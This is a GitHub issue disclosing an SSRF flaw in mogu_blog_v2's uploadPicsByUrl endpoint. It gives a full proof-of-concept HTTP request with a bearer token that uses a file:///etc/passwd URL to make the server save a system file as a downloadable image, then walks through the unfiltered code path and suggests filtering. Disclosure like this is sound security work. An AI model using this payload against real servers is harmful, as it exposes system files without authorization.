
mogu_blog_v2 FileRestApi#uploadPicsByUrl has an SSRF vulnerability #97

Open
c3p0ooo-Yiqiyin opened this issue Mar 30, 2023 · 0 comments

Comments

@c3p0ooo-Yiqiyin

1. Reproduction details

Construct a BurpSuite request that uses the file protocol to read the contents of /etc/passwd and write them into an image:

POST /mogu-picture/file/uploadPicsByUrl HTTP/1.1
Host: you-ip:8602
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: bearer_eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pblVpZCI6IjFmMDFjZDFkMmY0NzQ3NDNiMjQxZDc0MDA4YjEyMzMzIiwicm9sZSI6Im51bGzotoXnuqfnrqHnkIYiLCJjcmVhdGVUaW1lIjoxNjgwMTU2NjY4NTExLCJzdWIiOiJhZG1pbiIsImlzcyI6Im1vZ3VibG9nIiwiYXVkIjoiMDk4ZjZiY2Q0NjIxZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiLCJleHAiOjE2ODAxNjAyNjgsIm5iZiI6MTY4MDE1NjY2OH0.oXuQcn6Do52V7XkiPiH1Ug1XKOHNgKk4BTeksFgj8DI
Connection: close
Content-Type: application/json
Content-Length: 122

{
    "token": "asdf",
    "adminUid": "asdf",
    "sortName": "admin",
    "projectName": "blog",
    "urlList": [
        "file:///etc/passwd"
    ]
}


Visit the image address: http://your-ip:8600/blog/admin/jpg/2023/3/30/1680160261977.jpg

2. Code-level analysis

Entry point:
FileRestApi#uploadPicsByUrl

Entering the uploadPictureByUrl() method:
The incoming fileV0 is the request parameter object that Spring Boot binds automatically from the front-end request; urlList is taken out of fileV0.

Iterate over urlList and pass each entry into the uploadPictureByUrl() method, with no filtering in between:

Stepping further into the uploadPictureByUrl method:
No filtering is done in the uploadPictureByUrl method either; the URL is passed directly into the URL class.

After calling the openConnection method, the data stream is read and written to the output stream:

The path the file is written to (file output stream):

3. Remediation plan

(1) It is recommended to use the HttpURLConnection class instead of the URL class, and to check the IP address of the requested host, filtering out intranet IPs.
